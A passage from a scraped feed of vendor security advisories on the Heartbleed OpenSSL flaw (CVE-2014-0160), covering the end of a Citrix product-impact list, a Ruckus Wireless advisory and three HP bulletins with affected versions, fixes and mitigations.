This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html</a></u></span></p>\n<p> <span>o 5.1.0, and 5.1.1. Citrix has released a new version of XenClient Enterprise, 5.1.2. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix DesktopPlayer for Mac:</b> DesktopPlayer for Mac version 1.0.x up to and including version 1.0.3 is vulnerable to CVE-2014-0160. A new version of the Desktop Player for Mac, 1.0.4, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html\">https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html</a></u>. The TLS libraries used by currently supported versions of the DesktopPlayer Synchronizer are not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That May Require Third Party Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix XenDesktop 7.5:</b> Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of OpenSSL that is not vulnerable to CVE-2014-0160. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <u> <a href=\"https://support.citrix.com/article/CTX140428\">https://support.citrix.com/article/CTX140428</a></u>. Amazon Web Services based deployments use the Linux AMI template. 
Guidance from Amazon covering VMs based on this template can be found at the following location: <u> <a href=\"https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\">https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Android:</b> Receiver for Android makes use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement by Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u> <a name=\"P43_8077\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for Android:</b> Worx components running on Android make use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement from Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Linux:</b> The TLS libraries included in currently supported versions of Receiver for Linux are not vulnerable to CVE-2014-0160. Version 13.0 of the Receiver for Linux also makes use of the platform provided OpenSSL library. 
Customers using this version are advised to ensure that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Web Interface:</b> Web Interface makes use of the TLS functionality provided by the underlying web server. Citrix customers are advised to verify that any deployed web servers used to host Web Interface are not vulnerable to this issue. Web Interface can also use a built-in TLS library to make outgoing TLS connections, this library is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Business Manager: </b>This product does not include any TLS libraries and, as such, is not vulnerable to CVE-2014-0160. Some customer deployments may make use of an additional SSL proxy component; Citrix advises customers to contact the vendors of any SSL proxy components being used to determine if they are vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That Are Not Impacted:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix Provisioning Services:</b> Currently supported versions of Citrix Provisioning Services are not affected by CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenServer:</b> The TLS libraries used by currently supported versions of XenServer are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix VDI-in-a-Box:</b> The TLS libraries used by currently supported versions of VIAB are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDM Edition: </b>The TLS libraries used by components of XenMobile MDM edition, including the XenMobile Device Manager component, are not vulnerable to CVE-2014-0160<b>.</b></span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Services Manager:</b> The TLS libraries used by currently supported versions of CloudPortal Services Manager are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for 
Windows:</b> The TLS libraries used by currently supported versions of Receiver for Windows are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Mac:</b> The TLS libraries used by currently supported versions of Receiver for Mac are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for iOS:</b> The TLS libraries used by currently supported versions of Receiver for iOS are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix ByteMobile: </b>The TLS libraries used by currently supported versions of ByteMobile are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix NetScaler:</b> The TLS libraries used by currently supported versions of the NetScaler product are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Access Gateway</b>:<b> </b>The TLS libraries used by currently supported versions of Access Gateway are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudBridge:</b> The TLS libraries used by currently supported versions of Citrix CloudBridge, including client components, are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Secure Gateway (CSG):</b> The TLS library used by the currently supported version of CSG is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenApp SSLRelay Component:</b> The TLS libraries used by currently supported versions of the XenApp SSLRelay are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Single Sign-on, previously known as Password Manager:</b> The TLS libraries used by currently supported versions of Citrix Single Sign-on are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix StoreFront:</b> The TLS library used by currently supported versions of Citrix Storefront is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Merchandising Server:</b> The TLS 
library used by the currently supported version of Citrix Merchandising Server is not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Obtaining Support on This Issue</b></span></p>\n<p> <span>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"http://www.citrix.com/site/ss/supportContacts.asp\">http://www.citrix.com/site/ss/supportContacts.asp</a></u>. More information on the support status of Citrix products can be found on our website at the following address: <u> <a href=\"http://www.citrix.com/support/product-lifecycle/product-matrix.html\">http://www.citrix.com/support/product-lifecycle/product-matrix.html</a></u>.</span></p>\n<p> <span> <b>Reporting Security Vulnerabilities to Citrix</b></span></p>\n<p> <span>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. 
For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"/article/CTX081743\">Reporting Security Issues to Citrix</a></span></p>\n</div>\n</div></div>\n</section>", "edition": 2, "modified": "2019-08-15T04:00:00", "published": "2014-04-09T04:00:00", "id": "CTX140605", "href": "https://support.citrix.com/article/CTX140605", "title": "CVE-2014-0160 - Citrix Security Advisory for the Heartbleed vulnerability", "type": "citrix", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. 
This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n 
https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. 
Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04275280\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04275280\r\nVersion: 1\r\n\r\nHPSBMU03037 rev.1 - HP Multimedia Service Environment (MSE), (HP Network\r\nInteractive Voice Response (NIVR)), Remote Disclosure of 
Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-06\r\nLast Updated: 2014-05-06\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Multimedia\r\nService Environment (MSE), formerly known as HP Network Interactive Voice\r\nResponse (NIVR). This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences:\r\nCVE-2014-0160, SSRT101551\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Multimedia Service Environment (MSE) 2.1.1\r\nHP Network Interactive Voice Response (NIVR) 2.1.0, Reactive Patches 001,\r\n002, 003\r\nHP Network Interactive Voice Response (NIVR) 2.0.7, Reactive Patch 003\r\n\r\nOnly the MSE (ACM TMP) database set up with Replication using SSL is impacted\r\nfor the above versions. No other product interfaces are impacted. To\r\ndetermine if replication with SSL is set up, check if the USE_SSL line is\r\nuncommented in the file /etc/opt/OC/hpoc-nivr/nivr.properties\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions. 
This bulletin will be revised when the software updates are\r\nreleased.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 6 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNo/M4ACgkQ4B86/C0qfVl/5ACg4XO1B8jH2hYGdXEzhKUgYHnh\r\nY14AoJo2Z5A+GdPcbqNB7yMOoAkN+O5h\r\n=066r\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:DOC:30696", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30696", "title": "[security bulletin] HPSBMU03037 rev.1 - HP Multimedia Service Environment (MSE), (HP Network Interactive Voice Response (NIVR)), Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted 
upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL.This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. 
This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall 
not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server 
(On-Premises\r\nSoftware), Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server (on-premises\r\nsoftware) running OpenSSL. The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 (SSRT101505)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 (on-premises software)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n(on-premises software) that will address the OpenSSL vulnerability. 
https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0%26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server (on-premises Software). The bulletin does not apply\r\nto any other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
